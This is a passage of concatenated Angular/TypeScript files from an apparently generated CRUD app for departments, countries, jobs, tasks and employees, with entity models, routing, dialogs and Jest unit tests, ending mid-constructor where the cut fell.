<file_sep>import { ILocationMySuffix } from 'app/entities/location-my-suffix/location-my-suffix.model';
import { IEmployeeMySuffix } from 'app/entities/employee-my-suffix/employee-my-suffix.model';
export interface IDepartmentMySuffix {
id?: string;
departmentName?: string;
location?: ILocationMySuffix | null;
employees?: IEmployeeMySuffix[] | null;
}
export class DepartmentMySuffix implements IDepartmentMySuffix {
constructor(
public id?: string,
public departmentName?: string,
public location?: ILocationMySuffix | null,
public employees?: IEmployeeMySuffix[] | null
) {}
}
export function getDepartmentMySuffixIdentifier(department: IDepartmentMySuffix): string | undefined {
return department.id;
}
<file_sep>jest.mock('@angular/router');
import { ComponentFixture, TestBed } from '@angular/core/testing';
import { HttpResponse } from '@angular/common/http';
import { HttpClientTestingModule } from '@angular/common/http/testing';
import { FormBuilder } from '@angular/forms';
import { ActivatedRoute } from '@angular/router';
import { of, Subject } from 'rxjs';
import { CountryMySuffixService } from '../service/country-my-suffix.service';
import { ICountryMySuffix, CountryMySuffix } from '../country-my-suffix.model';
import { IRegionMySuffix } from 'app/entities/region-my-suffix/region-my-suffix.model';
import { RegionMySuffixService } from 'app/entities/region-my-suffix/service/region-my-suffix.service';
import { CountryMySuffixUpdateComponent } from './country-my-suffix-update.component';
describe('Component Tests', () => {
describe('CountryMySuffix Management Update Component', () => {
let comp: CountryMySuffixUpdateComponent;
let fixture: ComponentFixture<CountryMySuffixUpdateComponent>;
let activatedRoute: ActivatedRoute;
let countryService: CountryMySuffixService;
let regionService: RegionMySuffixService;
beforeEach(() => {
TestBed.configureTestingModule({
imports: [HttpClientTestingModule],
declarations: [CountryMySuffixUpdateComponent],
providers: [FormBuilder, ActivatedRoute],
})
.overrideTemplate(CountryMySuffixUpdateComponent, '')
.compileComponents();
fixture = TestBed.createComponent(CountryMySuffixUpdateComponent);
activatedRoute = TestBed.inject(ActivatedRoute);
countryService = TestBed.inject(CountryMySuffixService);
regionService = TestBed.inject(RegionMySuffixService);
comp = fixture.componentInstance;
});
describe('ngOnInit', () => {
it('Should call region query and add missing value', () => {
const country: ICountryMySuffix = { id: 'CBA' };
const region: IRegionMySuffix = { id: 'knowledge Usability' };
country.region = region;
const regionCollection: IRegionMySuffix[] = [{ id: 'schemas' }];
spyOn(regionService, 'query').and.returnValue(of(new HttpResponse({ body: regionCollection })));
const expectedCollection: IRegionMySuffix[] = [region, ...regionCollection];
spyOn(regionService, 'addRegionMySuffixToCollectionIfMissing').and.returnValue(expectedCollection);
activatedRoute.data = of({ country });
comp.ngOnInit();
expect(regionService.query).toHaveBeenCalled();
expect(regionService.addRegionMySuffixToCollectionIfMissing).toHaveBeenCalledWith(regionCollection, region);
expect(comp.regionsCollection).toEqual(expectedCollection);
});
it('Should update editForm', () => {
const country: ICountryMySuffix = { id: 'CBA' };
const region: IRegionMySuffix = { id: 'De-engineered' };
country.region = region;
activatedRoute.data = of({ country });
comp.ngOnInit();
expect(comp.editForm.value).toEqual(expect.objectContaining(country));
expect(comp.regionsCollection).toContain(region);
});
});
describe('save', () => {
it('Should call update service on save for existing entity', () => {
// GIVEN
const saveSubject = new Subject();
const country = { id: 'ABC' };
spyOn(countryService, 'update').and.returnValue(saveSubject);
spyOn(comp, 'previousState');
activatedRoute.data = of({ country });
comp.ngOnInit();
// WHEN
comp.save();
expect(comp.isSaving).toEqual(true);
saveSubject.next(new HttpResponse({ body: country }));
saveSubject.complete();
// THEN
expect(comp.previousState).toHaveBeenCalled();
expect(countryService.update).toHaveBeenCalledWith(country);
expect(comp.isSaving).toEqual(false);
});
it('Should call create service on save for new entity', () => {
// GIVEN
const saveSubject = new Subject();
const country = new CountryMySuffix();
spyOn(countryService, 'create').and.returnValue(saveSubject);
spyOn(comp, 'previousState');
activatedRoute.data = of({ country });
comp.ngOnInit();
// WHEN
comp.save();
expect(comp.isSaving).toEqual(true);
saveSubject.next(new HttpResponse({ body: country }));
saveSubject.complete();
// THEN
expect(countryService.create).toHaveBeenCalledWith(country);
expect(comp.isSaving).toEqual(false);
expect(comp.previousState).toHaveBeenCalled();
});
it('Should set isSaving to false on error', () => {
// GIVEN
const saveSubject = new Subject();
const country = { id: 'ABC' };
spyOn(countryService, 'update').and.returnValue(saveSubject);
spyOn(comp, 'previousState');
activatedRoute.data = of({ country });
comp.ngOnInit();
// WHEN
comp.save();
expect(comp.isSaving).toEqual(true);
saveSubject.error('This is an error!');
// THEN
expect(countryService.update).toHaveBeenCalledWith(country);
expect(comp.isSaving).toEqual(false);
expect(comp.previousState).not.toHaveBeenCalled();
});
});
describe('Tracking relationships identifiers', () => {
describe('trackRegionMySuffixById', () => {
it('Should return tracked RegionMySuffix primary key', () => {
const entity = { id: 'ABC' };
const trackResult = comp.trackRegionMySuffixById(0, entity);
expect(trackResult).toEqual(entity.id);
});
});
});
});
});
<file_sep>import { IJobMySuffix } from 'app/entities/job-my-suffix/job-my-suffix.model';
export interface ITaskMySuffix {
id?: string;
title?: string | null;
description?: string | null;
jobs?: IJobMySuffix[] | null;
}
export class TaskMySuffix implements ITaskMySuffix {
constructor(public id?: string, public title?: string | null, public description?: string | null, public jobs?: IJobMySuffix[] | null) {}
}
export function getTaskMySuffixIdentifier(task: ITaskMySuffix): string | undefined {
return task.id;
}
<file_sep>import { NgModule } from '@angular/core';
import { RouterModule, Routes } from '@angular/router';
import { UserRouteAccessService } from 'app/core/auth/user-route-access.service';
import { TaskMySuffixComponent } from '../list/task-my-suffix.component';
import { TaskMySuffixDetailComponent } from '../detail/task-my-suffix-detail.component';
import { TaskMySuffixUpdateComponent } from '../update/task-my-suffix-update.component';
import { TaskMySuffixRoutingResolveService } from './task-my-suffix-routing-resolve.service';
const taskRoute: Routes = [
{
path: '',
component: TaskMySuffixComponent,
canActivate: [UserRouteAccessService],
},
{
path: ':id/view',
component: TaskMySuffixDetailComponent,
resolve: {
task: TaskMySuffixRoutingResolveService,
},
canActivate: [UserRouteAccessService],
},
{
path: 'new',
component: TaskMySuffixUpdateComponent,
resolve: {
task: TaskMySuffixRoutingResolveService,
},
canActivate: [UserRouteAccessService],
},
{
path: ':id/edit',
component: TaskMySuffixUpdateComponent,
resolve: {
task: TaskMySuffixRoutingResolveService,
},
canActivate: [UserRouteAccessService],
},
];
@NgModule({
imports: [RouterModule.forChild(taskRoute)],
exports: [RouterModule],
})
export class TaskMySuffixRoutingModule {}
<file_sep>import { Component, OnInit } from '@angular/core';
import { HttpResponse } from '@angular/common/http';
import { NgbModal } from '@ng-bootstrap/ng-bootstrap';
import { ICountryMySuffix } from '../country-my-suffix.model';
import { CountryMySuffixService } from '../service/country-my-suffix.service';
import { CountryMySuffixDeleteDialogComponent } from '../delete/country-my-suffix-delete-dialog.component';
@Component({
selector: 'jhi-country-my-suffix',
templateUrl: './country-my-suffix.component.html',
})
export class CountryMySuffixComponent implements OnInit {
countries?: ICountryMySuffix[];
isLoading = false;
constructor(protected countryService: CountryMySuffixService, protected modalService: NgbModal) {}
loadAll(): void {
this.isLoading = true;
this.countryService.query().subscribe(
(res: HttpResponse<ICountryMySuffix[]>) => {
this.isLoading = false;
this.countries = res.body ?? [];
},
() => {
this.isLoading = false;
}
);
}
ngOnInit(): void {
this.loadAll();
}
trackId(index: number, item: ICountryMySuffix): string {
return item.id!;
}
delete(country: ICountryMySuffix): void {
const modalRef = this.modalService.open(CountryMySuffixDeleteDialogComponent, { size: 'lg', backdrop: 'static' });
modalRef.componentInstance.country = country;
// unsubscribe not needed because closed completes on modal close
modalRef.closed.subscribe(reason => {
if (reason === 'deleted') {
this.loadAll();
}
});
}
}
<file_sep>import { Injectable } from '@angular/core';
import { HttpResponse } from '@angular/common/http';
import { Resolve, ActivatedRouteSnapshot, Router } from '@angular/router';
import { Observable, of, EMPTY } from 'rxjs';
import { mergeMap } from 'rxjs/operators';
import { ICountryMySuffix, CountryMySuffix } from '../country-my-suffix.model';
import { CountryMySuffixService } from '../service/country-my-suffix.service';
@Injectable({ providedIn: 'root' })
export class CountryMySuffixRoutingResolveService implements Resolve<ICountryMySuffix> {
constructor(protected service: CountryMySuffixService, protected router: Router) {}
resolve(route: ActivatedRouteSnapshot): Observable<ICountryMySuffix> | Observable<never> {
const id = route.params['id'];
if (id) {
return this.service.find(id).pipe(
mergeMap((country: HttpResponse<CountryMySuffix>) => {
if (country.body) {
return of(country.body);
} else {
this.router.navigate(['404']);
return EMPTY;
}
})
);
}
return of(new CountryMySuffix());
}
}
<file_sep>jest.mock('@angular/router');
import { ComponentFixture, TestBed } from '@angular/core/testing';
import { HttpResponse } from '@angular/common/http';
import { HttpClientTestingModule } from '@angular/common/http/testing';
import { FormBuilder } from '@angular/forms';
import { ActivatedRoute } from '@angular/router';
import { of, Subject } from 'rxjs';
import { EmployeeMySuffixService } from '../service/employee-my-suffix.service';
import { IEmployeeMySuffix, EmployeeMySuffix } from '../employee-my-suffix.model';
import { IDepartmentMySuffix } from 'app/entities/department-my-suffix/department-my-suffix.model';
import { DepartmentMySuffixService } from 'app/entities/department-my-suffix/service/department-my-suffix.service';
import { EmployeeMySuffixUpdateComponent } from './employee-my-suffix-update.component';
describe('Component Tests', () => {
describe('EmployeeMySuffix Management Update Component', () => {
let comp: EmployeeMySuffixUpdateComponent;
let fixture: ComponentFixture<EmployeeMySuffixUpdateComponent>;
let activatedRoute: ActivatedRoute;
let employeeService: EmployeeMySuffixService;
let departmentService: DepartmentMySuffixService;
beforeEach(() => {
TestBed.configureTestingModule({
imports: [HttpClientTestingModule],
declarations: [EmployeeMySuffixUpdateComponent],
providers: [FormBuilder, ActivatedRoute],
})
.overrideTemplate(EmployeeMySuffixUpdateComponent, '')
.compileComponents();
fixture = TestBed.createComponent(EmployeeMySuffixUpdateComponent);
activatedRoute = TestBed.inject(ActivatedRoute);
employeeService = TestBed.inject(EmployeeMySuffixService);
departmentService = TestBed.inject(DepartmentMySuffixService);
comp = fixture.componentInstance;
});
describe('ngOnInit', () => {
it('Should call EmployeeMySuffix query and add missing value', () => {
const employee: IEmployeeMySuffix = { id: 'CBA' };
const manager: IEmployeeMySuffix = { id: '<NAME>' };
employee.manager = manager;
const employeeCollection: IEmployeeMySuffix[] = [{ id: 'Tuna' }];
spyOn(employeeService, 'query').and.returnValue(of(new HttpResponse({ body: employeeCollection })));
const additionalEmployeeMySuffixes = [manager];
const expectedCollection: IEmployeeMySuffix[] = [...additionalEmployeeMySuffixes, ...employeeCollection];
spyOn(employeeService, 'addEmployeeMySuffixToCollectionIfMissing').and.returnValue(expectedCollection);
activatedRoute.data = of({ employee });
comp.ngOnInit();
expect(employeeService.query).toHaveBeenCalled();
expect(employeeService.addEmployeeMySuffixToCollectionIfMissing).toHaveBeenCalledWith(
employeeCollection,
...additionalEmployeeMySuffixes
);
expect(comp.employeesSharedCollection).toEqual(expectedCollection);
});
it('Should call DepartmentMySuffix query and add missing value', () => {
const employee: IEmployeeMySuffix = { id: 'CBA' };
const department: IDepartmentMySuffix = { id: 'Rupee AGP engage' };
employee.department = department;
const departmentCollection: IDepartmentMySuffix[] = [{ id: '4th metrics' }];
spyOn(departmentService, 'query').and.returnValue(of(new HttpResponse({ body: departmentCollection })));
const additionalDepartmentMySuffixes = [department];
const expectedCollection: IDepartmentMySuffix[] = [...additionalDepartmentMySuffixes, ...departmentCollection];
spyOn(departmentService, 'addDepartmentMySuffixToCollectionIfMissing').and.returnValue(expectedCollection);
activatedRoute.data = of({ employee });
comp.ngOnInit();
expect(departmentService.query).toHaveBeenCalled();
expect(departmentService.addDepartmentMySuffixToCollectionIfMissing).toHaveBeenCalledWith(
departmentCollection,
...additionalDepartmentMySuffixes
);
expect(comp.departmentsSharedCollection).toEqual(expectedCollection);
});
it('Should update editForm', () => {
const employee: IEmployeeMySuffix = { id: 'CBA' };
const manager: IEmployeeMySuffix = { id: 'Handmade Assistant' };
employee.manager = manager;
const department: IDepartmentMySuffix = { id: 'open-source' };
employee.department = department;
activatedRoute.data = of({ employee });
comp.ngOnInit();
expect(comp.editForm.value).toEqual(expect.objectContaining(employee));
expect(comp.employeesSharedCollection).toContain(manager);
expect(comp.departmentsSharedCollection).toContain(department);
});
});
describe('save', () => {
it('Should call update service on save for existing entity', () => {
// GIVEN
const saveSubject = new Subject();
const employee = { id: 'ABC' };
spyOn(employeeService, 'update').and.returnValue(saveSubject);
spyOn(comp, 'previousState');
activatedRoute.data = of({ employee });
comp.ngOnInit();
// WHEN
comp.save();
expect(comp.isSaving).toEqual(true);
saveSubject.next(new HttpResponse({ body: employee }));
saveSubject.complete();
// THEN
expect(comp.previousState).toHaveBeenCalled();
expect(employeeService.update).toHaveBeenCalledWith(employee);
expect(comp.isSaving).toEqual(false);
});
it('Should call create service on save for new entity', () => {
// GIVEN
const saveSubject = new Subject();
const employee = new EmployeeMySuffix();
spyOn(employeeService, 'create').and.returnValue(saveSubject);
spyOn(comp, 'previousState');
activatedRoute.data = of({ employee });
comp.ngOnInit();
// WHEN
comp.save();
expect(comp.isSaving).toEqual(true);
saveSubject.next(new HttpResponse({ body: employee }));
saveSubject.complete();
// THEN
expect(employeeService.create).toHaveBeenCalledWith(employee);
expect(comp.isSaving).toEqual(false);
expect(comp.previousState).toHaveBeenCalled();
});
it('Should set isSaving to false on error', () => {
// GIVEN
const saveSubject = new Subject();
const employee = { id: 'ABC' };
spyOn(employeeService, 'update').and.returnValue(saveSubject);
spyOn(comp, 'previousState');
activatedRoute.data = of({ employee });
comp.ngOnInit();
// WHEN
comp.save();
expect(comp.isSaving).toEqual(true);
saveSubject.error('This is an error!');
// THEN
expect(employeeService.update).toHaveBeenCalledWith(employee);
expect(comp.isSaving).toEqual(false);
expect(comp.previousState).not.toHaveBeenCalled();
});
});
describe('Tracking relationships identifiers', () => {
describe('trackEmployeeMySuffixById', () => {
it('Should return tracked EmployeeMySuffix primary key', () => {
const entity = { id: 'ABC' };
const trackResult = comp.trackEmployeeMySuffixById(0, entity);
expect(trackResult).toEqual(entity.id);
});
});
describe('trackDepartmentMySuffixById', () => {
it('Should return tracked DepartmentMySuffix primary key', () => {
const entity = { id: 'ABC' };
const trackResult = comp.trackDepartmentMySuffixById(0, entity);
expect(trackResult).toEqual(entity.id);
});
});
});
});
});
<file_sep>import { TestBed } from '@angular/core/testing';
import { HttpClientTestingModule, HttpTestingController } from '@angular/common/http/testing';
import * as dayjs from 'dayjs';
import { DATE_TIME_FORMAT } from 'app/config/input.constants';
import { Language } from 'app/entities/enumerations/language.model';
import { IJobHistoryMySuffix, JobHistoryMySuffix } from '../job-history-my-suffix.model';
import { JobHistoryMySuffixService } from './job-history-my-suffix.service';
describe('Service Tests', () => {
describe('JobHistoryMySuffix Service', () => {
let service: JobHistoryMySuffixService;
let httpMock: HttpTestingController;
let elemDefault: IJobHistoryMySuffix;
let expectedResult: IJobHistoryMySuffix | IJobHistoryMySuffix[] | boolean | null;
let currentDate: dayjs.Dayjs;
beforeEach(() => {
TestBed.configureTestingModule({
imports: [HttpClientTestingModule],
});
expectedResult = null;
service = TestBed.inject(JobHistoryMySuffixService);
httpMock = TestBed.inject(HttpTestingController);
currentDate = dayjs();
elemDefault = {
id: 'AAAAAAA',
startDate: currentDate,
endDate: currentDate,
language: Language.FRENCH,
};
});
describe('Service methods', () => {
it('should find an element', () => {
const returnedFromService = Object.assign(
{
startDate: currentDate.format(DATE_TIME_FORMAT),
endDate: currentDate.format(DATE_TIME_FORMAT),
},
elemDefault
);
service.find('ABC').subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'GET' });
req.flush(returnedFromService);
expect(expectedResult).toMatchObject(elemDefault);
});
it('should create a JobHistoryMySuffix', () => {
const returnedFromService = Object.assign(
{
id: 'ID',
startDate: currentDate.format(DATE_TIME_FORMAT),
endDate: currentDate.format(DATE_TIME_FORMAT),
},
elemDefault
);
const expected = Object.assign(
{
startDate: currentDate,
endDate: currentDate,
},
returnedFromService
);
service.create(new JobHistoryMySuffix()).subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'POST' });
req.flush(returnedFromService);
expect(expectedResult).toMatchObject(expected);
});
it('should update a JobHistoryMySuffix', () => {
const returnedFromService = Object.assign(
{
id: 'BBBBBB',
startDate: currentDate.format(DATE_TIME_FORMAT),
endDate: currentDate.format(DATE_TIME_FORMAT),
language: 'BBBBBB',
},
elemDefault
);
const expected = Object.assign(
{
startDate: currentDate,
endDate: currentDate,
},
returnedFromService
);
service.update(expected).subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'PUT' });
req.flush(returnedFromService);
expect(expectedResult).toMatchObject(expected);
});
it('should partial update a JobHistoryMySuffix', () => {
const patchObject = Object.assign(
{
language: 'BBBBBB',
},
new JobHistoryMySuffix()
);
const returnedFromService = Object.assign(patchObject, elemDefault);
const expected = Object.assign(
{
startDate: currentDate,
endDate: currentDate,
},
returnedFromService
);
service.partialUpdate(patchObject).subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'PATCH' });
req.flush(returnedFromService);
expect(expectedResult).toMatchObject(expected);
});
it('should return a list of JobHistoryMySuffix', () => {
const returnedFromService = Object.assign(
{
id: 'BBBBBB',
startDate: currentDate.format(DATE_TIME_FORMAT),
endDate: currentDate.format(DATE_TIME_FORMAT),
language: 'BBBBBB',
},
elemDefault
);
const expected = Object.assign(
{
startDate: currentDate,
endDate: currentDate,
},
returnedFromService
);
service.query().subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'GET' });
req.flush([returnedFromService]);
httpMock.verify();
expect(expectedResult).toContainEqual(expected);
});
it('should delete a JobHistoryMySuffix', () => {
service.delete('ABC').subscribe(resp => (expectedResult = resp.ok));
const req = httpMock.expectOne({ method: 'DELETE' });
req.flush({ status: 200 });
expect(expectedResult);
});
describe('addJobHistoryMySuffixToCollectionIfMissing', () => {
it('should add a JobHistoryMySuffix to an empty array', () => {
const jobHistory: IJobHistoryMySuffix = { id: 'ABC' };
expectedResult = service.addJobHistoryMySuffixToCollectionIfMissing([], jobHistory);
expect(expectedResult).toHaveLength(1);
expect(expectedResult).toContain(jobHistory);
});
it('should not add a JobHistoryMySuffix to an array that contains it', () => {
const jobHistory: IJobHistoryMySuffix = { id: 'ABC' };
const jobHistoryCollection: IJobHistoryMySuffix[] = [
{
...jobHistory,
},
{ id: 'CBA' },
];
expectedResult = service.addJobHistoryMySuffixToCollectionIfMissing(jobHistoryCollection, jobHistory);
expect(expectedResult).toHaveLength(2);
});
it("should add a JobHistoryMySuffix to an array that doesn't contain it", () => {
const jobHistory: IJobHistoryMySuffix = { id: 'ABC' };
const jobHistoryCollection: IJobHistoryMySuffix[] = [{ id: 'CBA' }];
expectedResult = service.addJobHistoryMySuffixToCollectionIfMissing(jobHistoryCollection, jobHistory);
expect(expectedResult).toHaveLength(2);
expect(expectedResult).toContain(jobHistory);
});
it('should add only unique JobHistoryMySuffix to an array', () => {
const jobHistoryArray: IJobHistoryMySuffix[] = [{ id: 'ABC' }, { id: 'CBA' }, { id: 'B2C solid Future' }];
const jobHistoryCollection: IJobHistoryMySuffix[] = [{ id: 'ABC' }];
expectedResult = service.addJobHistoryMySuffixToCollectionIfMissing(jobHistoryCollection, ...jobHistoryArray);
expect(expectedResult).toHaveLength(3);
});
it('should accept varargs', () => {
const jobHistory: IJobHistoryMySuffix = { id: 'ABC' };
const jobHistory2: IJobHistoryMySuffix = { id: 'CBA' };
expectedResult = service.addJobHistoryMySuffixToCollectionIfMissing([], jobHistory, jobHistory2);
expect(expectedResult).toHaveLength(2);
expect(expectedResult).toContain(jobHistory);
expect(expectedResult).toContain(jobHistory2);
});
it('should accept null and undefined values', () => {
const jobHistory: IJobHistoryMySuffix = { id: 'ABC' };
expectedResult = service.addJobHistoryMySuffixToCollectionIfMissing([], null, jobHistory, undefined);
expect(expectedResult).toHaveLength(1);
expect(expectedResult).toContain(jobHistory);
});
});
});
afterEach(() => {
httpMock.verify();
});
});
});
<file_sep>import { Component } from '@angular/core';
import { NgbActiveModal } from '@ng-bootstrap/ng-bootstrap';
import { ITaskMySuffix } from '../task-my-suffix.model';
import { TaskMySuffixService } from '../service/task-my-suffix.service';
@Component({
templateUrl: './task-my-suffix-delete-dialog.component.html',
})
export class TaskMySuffixDeleteDialogComponent {
task?: ITaskMySuffix;
constructor(protected taskService: TaskMySuffixService, public activeModal: NgbActiveModal) {}
cancel(): void {
this.activeModal.dismiss();
}
confirmDelete(id: string): void {
this.taskService.delete(id).subscribe(() => {
this.activeModal.close('deleted');
});
}
}
<file_sep>import { NgModule } from '@angular/core';
import { SharedModule } from 'app/shared/shared.module';
import { JobMySuffixComponent } from './list/job-my-suffix.component';
import { JobMySuffixDetailComponent } from './detail/job-my-suffix-detail.component';
import { JobMySuffixUpdateComponent } from './update/job-my-suffix-update.component';
import { JobMySuffixDeleteDialogComponent } from './delete/job-my-suffix-delete-dialog.component';
import { JobMySuffixRoutingModule } from './route/job-my-suffix-routing.module';
@NgModule({
imports: [SharedModule, JobMySuffixRoutingModule],
declarations: [JobMySuffixComponent, JobMySuffixDetailComponent, JobMySuffixUpdateComponent, JobMySuffixDeleteDialogComponent],
entryComponents: [JobMySuffixDeleteDialogComponent],
})
export class JobMySuffixModule {}
<file_sep>import { Component } from '@angular/core';
import { NgbActiveModal } from '@ng-bootstrap/ng-bootstrap';
import { IJobMySuffix } from '../job-my-suffix.model';
import { JobMySuffixService } from '../service/job-my-suffix.service';
@Component({
templateUrl: './job-my-suffix-delete-dialog.component.html',
})
export class JobMySuffixDeleteDialogComponent {
job?: IJobMySuffix;
constructor(protected jobService: JobMySuffixService, public activeModal: NgbActiveModal) {}
cancel(): void {
this.activeModal.dismiss();
}
confirmDelete(id: string): void {
this.jobService.delete(id).subscribe(() => {
this.activeModal.close('deleted');
});
}
}
<file_sep>import { IRegionMySuffix } from 'app/entities/region-my-suffix/region-my-suffix.model';
export interface ICountryMySuffix {
id?: string;
countryName?: string | null;
region?: IRegionMySuffix | null;
}
export class CountryMySuffix implements ICountryMySuffix {
constructor(public id?: string, public countryName?: string | null, public region?: IRegionMySuffix | null) {}
}
export function getCountryMySuffixIdentifier(country: ICountryMySuffix): string | undefined {
return country.id;
}
<file_sep>import { NgModule } from '@angular/core';
import { SharedModule } from 'app/shared/shared.module';
import { CountryMySuffixComponent } from './list/country-my-suffix.component';
import { CountryMySuffixDetailComponent } from './detail/country-my-suffix-detail.component';
import { CountryMySuffixUpdateComponent } from './update/country-my-suffix-update.component';
import { CountryMySuffixDeleteDialogComponent } from './delete/country-my-suffix-delete-dialog.component';
import { CountryMySuffixRoutingModule } from './route/country-my-suffix-routing.module';
@NgModule({
imports: [SharedModule, CountryMySuffixRoutingModule],
declarations: [
CountryMySuffixComponent,
CountryMySuffixDetailComponent,
CountryMySuffixUpdateComponent,
CountryMySuffixDeleteDialogComponent,
],
entryComponents: [CountryMySuffixDeleteDialogComponent],
})
export class CountryMySuffixModule {}
<file_sep>import { TestBed } from '@angular/core/testing';
import { HttpClientTestingModule, HttpTestingController } from '@angular/common/http/testing';
import { IDepartmentMySuffix, DepartmentMySuffix } from '../department-my-suffix.model';
import { DepartmentMySuffixService } from './department-my-suffix.service';
describe('Service Tests', () => {
describe('DepartmentMySuffix Service', () => {
let service: DepartmentMySuffixService;
let httpMock: HttpTestingController;
let elemDefault: IDepartmentMySuffix;
let expectedResult: IDepartmentMySuffix | IDepartmentMySuffix[] | boolean | null;
beforeEach(() => {
TestBed.configureTestingModule({
imports: [HttpClientTestingModule],
});
expectedResult = null;
service = TestBed.inject(DepartmentMySuffixService);
httpMock = TestBed.inject(HttpTestingController);
elemDefault = {
id: 'AAAAAAA',
departmentName: 'AAAAAAA',
};
});
describe('Service methods', () => {
it('should find an element', () => {
const returnedFromService = Object.assign({}, elemDefault);
service.find('ABC').subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'GET' });
req.flush(returnedFromService);
expect(expectedResult).toMatchObject(elemDefault);
});
it('should create a DepartmentMySuffix', () => {
const returnedFromService = Object.assign(
{
id: 'ID',
},
elemDefault
);
const expected = Object.assign({}, returnedFromService);
service.create(new DepartmentMySuffix()).subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'POST' });
req.flush(returnedFromService);
expect(expectedResult).toMatchObject(expected);
});
it('should update a DepartmentMySuffix', () => {
const returnedFromService = Object.assign(
{
id: 'BBBBBB',
departmentName: 'BBBBBB',
},
elemDefault
);
const expected = Object.assign({}, returnedFromService);
service.update(expected).subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'PUT' });
req.flush(returnedFromService);
expect(expectedResult).toMatchObject(expected);
});
it('should partial update a DepartmentMySuffix', () => {
const patchObject = Object.assign({}, new DepartmentMySuffix());
const returnedFromService = Object.assign(patchObject, elemDefault);
const expected = Object.assign({}, returnedFromService);
service.partialUpdate(patchObject).subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'PATCH' });
req.flush(returnedFromService);
expect(expectedResult).toMatchObject(expected);
});
it('should return a list of DepartmentMySuffix', () => {
const returnedFromService = Object.assign(
{
id: 'BBBBBB',
departmentName: 'BBBBBB',
},
elemDefault
);
const expected = Object.assign({}, returnedFromService);
service.query().subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'GET' });
req.flush([returnedFromService]);
httpMock.verify();
expect(expectedResult).toContainEqual(expected);
});
it('should delete a DepartmentMySuffix', () => {
service.delete('ABC').subscribe(resp => (expectedResult = resp.ok));
const req = httpMock.expectOne({ method: 'DELETE' });
req.flush({ status: 200 });
expect(expectedResult);
});
describe('addDepartmentMySuffixToCollectionIfMissing', () => {
it('should add a DepartmentMySuffix to an empty array', () => {
const department: IDepartmentMySuffix = { id: 'ABC' };
expectedResult = service.addDepartmentMySuffixToCollectionIfMissing([], department);
expect(expectedResult).toHaveLength(1);
expect(expectedResult).toContain(department);
});
it('should not add a DepartmentMySuffix to an array that contains it', () => {
const department: IDepartmentMySuffix = { id: 'ABC' };
const departmentCollection: IDepartmentMySuffix[] = [
{
...department,
},
{ id: 'CBA' },
];
expectedResult = service.addDepartmentMySuffixToCollectionIfMissing(departmentCollection, department);
expect(expectedResult).toHaveLength(2);
});
it("should add a DepartmentMySuffix to an array that doesn't contain it", () => {
const department: IDepartmentMySuffix = { id: 'ABC' };
const departmentCollection: IDepartmentMySuffix[] = [{ id: 'CBA' }];
expectedResult = service.addDepartmentMySuffixToCollectionIfMissing(departmentCollection, department);
expect(expectedResult).toHaveLength(2);
expect(expectedResult).toContain(department);
});
it('should add only unique DepartmentMySuffix to an array', () => {
const departmentArray: IDepartmentMySuffix[] = [{ id: 'ABC' }, { id: 'CBA' }, { id: 'Administrator' }];
const departmentCollection: IDepartmentMySuffix[] = [{ id: 'ABC' }];
expectedResult = service.addDepartmentMySuffixToCollectionIfMissing(departmentCollection, ...departmentArray);
expect(expectedResult).toHaveLength(3);
});
it('should accept varargs', () => {
const department: IDepartmentMySuffix = { id: 'ABC' };
const department2: IDepartmentMySuffix = { id: 'CBA' };
expectedResult = service.addDepartmentMySuffixToCollectionIfMissing([], department, department2);
expect(expectedResult).toHaveLength(2);
expect(expectedResult).toContain(department);
expect(expectedResult).toContain(department2);
});
it('should accept null and undefined values', () => {
const department: IDepartmentMySuffix = { id: 'ABC' };
expectedResult = service.addDepartmentMySuffixToCollectionIfMissing([], null, department, undefined);
expect(expectedResult).toHaveLength(1);
expect(expectedResult).toContain(department);
});
});
});
afterEach(() => {
httpMock.verify();
});
});
});
<file_sep>import { NgModule } from '@angular/core';
import { RouterModule, Routes } from '@angular/router';
import { UserRouteAccessService } from 'app/core/auth/user-route-access.service';
import { JobMySuffixComponent } from '../list/job-my-suffix.component';
import { JobMySuffixDetailComponent } from '../detail/job-my-suffix-detail.component';
import { JobMySuffixUpdateComponent } from '../update/job-my-suffix-update.component';
import { JobMySuffixRoutingResolveService } from './job-my-suffix-routing-resolve.service';
const jobRoute: Routes = [
{
path: '',
component: JobMySuffixComponent,
data: {
defaultSort: 'id,asc',
},
canActivate: [UserRouteAccessService],
},
{
path: ':id/view',
component: JobMySuffixDetailComponent,
resolve: {
job: JobMySuffixRoutingResolveService,
},
canActivate: [UserRouteAccessService],
},
{
path: 'new',
component: JobMySuffixUpdateComponent,
resolve: {
job: JobMySuffixRoutingResolveService,
},
canActivate: [UserRouteAccessService],
},
{
path: ':id/edit',
component: JobMySuffixUpdateComponent,
resolve: {
job: JobMySuffixRoutingResolveService,
},
canActivate: [UserRouteAccessService],
},
];
@NgModule({
imports: [RouterModule.forChild(jobRoute)],
exports: [RouterModule],
})
export class JobMySuffixRoutingModule {}
<file_sep>import { Component, OnInit } from '@angular/core';
import { HttpResponse } from '@angular/common/http';
import { FormBuilder } from '@angular/forms';
import { ActivatedRoute } from '@angular/router';
import { Observable } from 'rxjs';
import { finalize, map } from 'rxjs/operators';
import { IJobMySuffix, JobMySuffix } from '../job-my-suffix.model';
import { JobMySuffixService } from '../service/job-my-suffix.service';
import { ITaskMySuffix } from 'app/entities/task-my-suffix/task-my-suffix.model';
import { TaskMySuffixService } from 'app/entities/task-my-suffix/service/task-my-suffix.service';
import { IEmployeeMySuffix } from 'app/entities/employee-my-suffix/employee-my-suffix.model';
import { EmployeeMySuffixService } from 'app/entities/employee-my-suffix/service/employee-my-suffix.service';
@Component({
selector: 'jhi-job-my-suffix-update',
templateUrl: './job-my-suffix-update.component.html',
})
export class JobMySuffixUpdateComponent implements OnInit {
isSaving = false;
tasksSharedCollection: ITaskMySuffix[] = [];
employeesSharedCollection: IEmployeeMySuffix[] = [];
editForm = this.fb.group({
id: [],
jobTitle: [],
minSalary: [],
maxSalary: [],
tasks: [],
employee: [],
});
constructor(
